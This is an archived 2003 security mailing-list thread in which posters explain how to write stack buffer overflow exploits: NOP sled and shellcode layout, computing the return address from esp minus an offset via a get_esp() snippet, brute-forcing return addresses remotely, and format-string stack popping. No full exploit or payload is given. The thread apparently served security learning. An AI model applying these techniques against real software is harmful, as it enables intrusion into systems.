Re: Some help With BOF Exploits Writing.

• Previous message: Vizzy: "Re: Password Cracking Challenge..."
• Maybe in reply to: deepcode .: "Re: Some help With BOF Exploits Writing."
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: vuln-dev@securityfocus.com
Date: Tue, 29 Jul 2003 16:09:31 +0800

which one will you consider a better approach?

placing shellcode before or after return addr?
 

----- Original Message -----
From: DownBload <downbload@hotmail.com>
Date: 26 Jul 2003 12:39:18 -0000
To: vuln-dev@securityfocus.com
Subject: Re: Some help With BOF Exploits Writing.

> In-Reply-To: <Law9-F5967EKRuYDlrj00009721@hotmail.com>
>
> Remote bof exploitation is little bit harder, because you can't just
> do "movl %esp, %eax" for finding return address. In classic buffer
> overflows, for remote exploits, try to install vuln. application on your
> host and find return address. Then you can code exploit which will
> probably work on same architecture, OS and application version as yours.
> For remote (local also) exploits, you can use return address brute force
> method.
> Remote format string exploits are much more hackers-friendly than classic
> buffer overflows in return address finding. You can just pop stack with %x%
> x%x%x%x.
>
> DownBload / Illegal Instruction Labs <www.kamikaza.org>
>
>
> >
> >The return address should be before your shellcode, inside the nop's.
> >
> >[NNNNNNNNNSSSSSSSSSSSSSRET] buffer stored on stack.
> >5 1 2 3 4
> >0xFFFFA 0xFFFFD 0xFFFFE grows upwards.
> >
> >1. Bunch of nop instructions: 0x90, that do nothing, so execution goes to
> >the right until your code
> > is executed.
> >
> >2. shellcode.
> >
> >3. return address, which is calculated to point somewhere within the nop
> >operations, this is calculated
> > locally, by using the stack pointer esp. see 4.
> >
> >4. Esp stack pointer points to the top of stack, which is usually here,
> >unless there is other data
> > on the stack, to calculate the address of the NOP's, you'd get the esp
> >address and subtract
> > an offset from it depending on the size of the data within the stack.
> >
> >5. Ebp, the current location inside the stack, so if anything gets
> pushed,
> >it'll get pushed here and
> > ebp will continue to shift to the left as more things are added to the
> >stack.
> >
> >most unix code does this like this:
> >-----------------------------
> >get_esp()
> >{
> >__asm__("movl %esp, %eax"); puts the esp (current stack top) into eax.
> Eax
> >is the return value
> >} of most function calls in C.
> >
> >//calculate ret, using offset supplied by user.
> >
> >offset = atoi(argv[1]); will crash if there was no input
> >however. Should check first.
> >RET = get_esp() - offset;
> >
> >----------------------------------
> >
> >[NNNNNNNNNNNNNSSSSSSSSSSSSSSSRET]
> >10 20 30 40 50 60
> >
> >simple decimal example.
> >
> >/exploit 20
> >
> >RET = Getesp() - offset
> >RET = 60 - 20
> >RET = 40
> >
> >crash .. middle of shellcode
> >
> >/exploit 40
> >
> >RET = getesp() - offset
> >RET = 60 - 40
> >RET = 20
> >
> >Bingo, right in the nops, execution moves to the right until shellcode
> >hits.. thats the basic way of
> >doing it anyway.
> >
> >Another method is by putting the shellcode, and alot more nops inside an
> >environment variable, to
> >increase the size of the padding(NOPs) to increase chances of success and
> >have less guesswork.
> >
> >Anyone want to add to this?
> >
> >And a question of my own, how does remote exploits accomplish this??
> Thats
> >been on my mind for
> >quite some time.
> >
> >deepcode
> >
> >>From: "theetabond" <theetabond@rediffmail.com>
> >>Reply-To: "theetabond" <theetabond@rediffmail.com>
> >>To: pondermate@hotmail.com
> >>Subject: Some help With BOF Exploits Writing.
> >>Date: 25 Jul 2003 06:56:15 -0000
> >>
> >>Hi there DeepCode,
> >> I've been reading u'r recent posts on Vul-Dev, and
> they
> >>were very informative and useful for me. I had some questions in my mind
> >>regarding writing buffer overflows on Win32 platform, and i hope may be
> you
> >>cud help me with that.
> >>I had written some exploits ( stack overflow ) for win98 successfully.
> But
> >>now i want to do the same thing at win2k/winxp platforms. My problem in
> >>this is - in calculating the return address which u write over the
> previous
> >>RET instruction. On win98 i had a util called getcode.exe , which will
> scan
> >>the memory and list out the jmp eax, ret eax, call eax, call ebx and
> >>similar useful addresses which u can use to write at return addresses.
> >>Unfortunately this particular tool deosn't work on win2k/Xp. So how can
> i
> >>calculate the return address on 2k/Xp platform?? Dissembling the
> DLLs/EXEs
> >>and searching them all for such instances is kinda hard to do.
> >> So is there any way/tool which can give me the desired output ??
> >>Thank You Very Much
> >>theeta.
> >>
> >>
> >
> >_________________________________________________________________
> >Add photos to your e-mail with MSN 8. Get 2 months FREE*.
> >http://join.msn.com/?page=features/featuredemail
> >
> >

-- 
______________________________________________
http://www.linuxmail.org/
Now with e-mail forwarding for only US$5.95/yr
Powered by Outblaze

• Previous message: Vizzy: "Re: Password Cracking Challenge..."
• Maybe in reply to: deepcode .: "Re: Some help With BOF Exploits Writing."
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]